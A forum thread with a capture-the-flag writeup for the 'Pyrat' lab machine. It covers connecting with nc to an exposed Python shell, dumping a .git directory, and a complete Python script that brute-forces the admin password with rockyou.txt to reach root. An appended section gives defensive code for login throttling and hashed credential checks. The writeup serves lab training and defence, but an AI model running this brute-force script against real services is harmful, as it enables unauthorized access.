Let’s discuss Pyrat
Test your enumeration skills on this boot-to-root machine.
Machine rooted, I’ll post writeup later on.
For Initial Foothold, try connecting to the port you found using nc.
And no, the nc session isn’t hanging; this is all you need.
Here is the writeup for those interested.
After running nmap we’ll get 22 (ssh) and 8000. Connecting to http://IP_ADDRESS:8000/ will ask us to use a basic connection, which refers to sockets. Using nc to connect to that port with nc IP 8000 will get us into a python environment where we can either get a reverse shell or just type shell.
Once on the box, we can find a .git directory under /opt/dev. Hosting a python web server on the target machine and utilizing git-dumper to get it on our host will give us the source code. Looking through the git logs we can find the GitHub account, where we can find the source code for the PyRAT.
Looking through the source code we came across an “admin” command; once typed in the python env it will ask for a password. In the source code there is a password, but it doesn’t work, so the idea here is to create a python script that will try to bruteforce the admin password.
import socket

# Define the target IP and port
target_ip = 'Target_Machine_IP'
target_port = 8000

# Load your wordlist of passwords in binary mode
with open('/usr/share/wordlists/rockyou.txt', 'rb') as f:
    passwords = f.readlines()

for password in passwords:
    password = password.strip()  # Remove newline characters
    # Decode each password, dropping bytes that are not valid UTF-8
    password = password.decode('utf-8', errors='ignore')
    if not password:
        continue  # Skip empty lines

    # Create a fresh socket for every attempt
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((target_ip, target_port))
        # Send the 'admin' command
        s.send(b"admin\n")
        response = s.recv(1024).decode(errors='ignore')
        if "password" in response.lower():
            print(f"Trying password: {password}")
            s.send(password.encode() + b"\n")
            # Read the response from the server after the password attempt
            response = s.recv(1024).decode(errors='ignore')
            # Check if the password is correct
            if "welcome admin" in response.lower():
                print(f"Success! Password is: {password}")
                break
            else:
                print(f"Password {password} is incorrect.")
        else:
            print("No password prompt received.")
    finally:
        s.close()  # Always close the connection before the next attempt
We only need to execute the script using python3 script_name.py and you’ll get the password, which you can use to get a root shell!
And that’s it.
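The admin prompt above falls to an online dictionary attack because the service accepts unlimited guesses at full speed and stores a guessable password. As an added example (my own code, not part of this thread or of the Pyrat machine's source), here is the kind of per-client failed-attempt throttle and hashed credential check that a socket service of this sort could put in front of its "admin" command. The response strings, the lockout thresholds, the salt, the password "correct horse", the client address 10.0.0.5 and the handle_admin_login function are all constructed for the example and are not the machine's real values.

```python
import hashlib
import hmac
from collections import defaultdict

# Tunables, chosen for this example, not taken from the machine
MAX_FAILURES = 5          # failed guesses allowed per client within the window
WINDOW_SECONDS = 60.0     # sliding window over which failures are counted
LOCKOUT_SECONDS = 300.0   # how long a client is refused after hitting the limit

# Constructed response strings (the real service's wording is not reproduced here)
WRONG_MSG = "Password incorrect"
LOCKED_MSG = "Too many failed attempts, try again later"
WELCOME_MSG = "Welcome admin, type shell to get a shell"


class LoginThrottle:
    """Counts failed password attempts per client address and locks out any
    client that exceeds MAX_FAILURES within WINDOW_SECONDS."""

    def __init__(self, clock):
        self._clock = clock                  # injectable clock so tests can fake time
        self._failures = defaultdict(list)   # client -> timestamps of recent failures
        self._locked_until = {}              # client -> time at which the lock expires

    def is_locked(self, client):
        now = self._clock()
        until = self._locked_until.get(client)
        if until is None:
            return False
        if now >= until:                     # lock expired: forget the history
            del self._locked_until[client]
            self._failures.pop(client, None)
            return False
        return True

    def record_failure(self, client):
        now = self._clock()
        recent = [t for t in self._failures[client] if now - t < WINDOW_SECONDS]
        recent.append(now)
        self._failures[client] = recent
        if len(recent) >= MAX_FAILURES:
            self._locked_until[client] = now + LOCKOUT_SECONDS

    def record_success(self, client):
        self._failures.pop(client, None)
        self._locked_until.pop(client, None)


# Hypothetical stored credential: a salted PBKDF2 hash, never a plaintext
# password sitting in the source as in the writeup's target
_SALT = b"example-salt-not-from-the-machine"
_ITERATIONS = 10_000
_ADMIN_HASH = hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, _ITERATIONS)


def check_admin_password(candidate):
    """Derive the key for the candidate and compare in constant time."""
    derived = hashlib.pbkdf2_hmac("sha256", candidate.encode(), _SALT, _ITERATIONS)
    return hmac.compare_digest(derived, _ADMIN_HASH)


def handle_admin_login(throttle, client, candidate):
    """One password attempt on the hypothetical 'admin' command. Returns the line
    the client would see; a locked-out client never reaches the password check."""
    if throttle.is_locked(client):
        return LOCKED_MSG
    if check_admin_password(candidate):
        throttle.record_success(client)
        return WELCOME_MSG
    throttle.record_failure(client)
    return WRONG_MSG


def simulate_guesses(guesses, spacing_seconds=0.01):
    """Constructed scenario: one client sends the guesses spacing_seconds apart
    on a fake clock. Returns the list of responses it would receive."""
    fake_now = [0.0]
    throttle = LoginThrottle(clock=lambda: fake_now[0])
    responses = []
    for guess in guesses:
        fake_now[0] += spacing_seconds
        responses.append(handle_admin_login(throttle, "10.0.0.5", guess))
    return responses


if __name__ == "__main__":
    # A scripted run like the writeup's: fast guesses, right answer sixth in line
    for guess, reply in zip(
        ["123456", "password", "qwerty", "letmein", "abc123", "correct horse"],
        simulate_guesses(["123456", "password", "qwerty", "letmein", "abc123", "correct horse"]),
    ):
        print(f"{guess!r:18} -> {reply}")
```

With these settings the sixth guess is refused even though it is correct, so a rockyou-style run stalls after five attempts per lockout period instead of walking the whole list. A per-address counter is only one layer: a distributed or slow attack still needs the hashed credential and the absence of a hard-coded password to fail, which is why both are shown together.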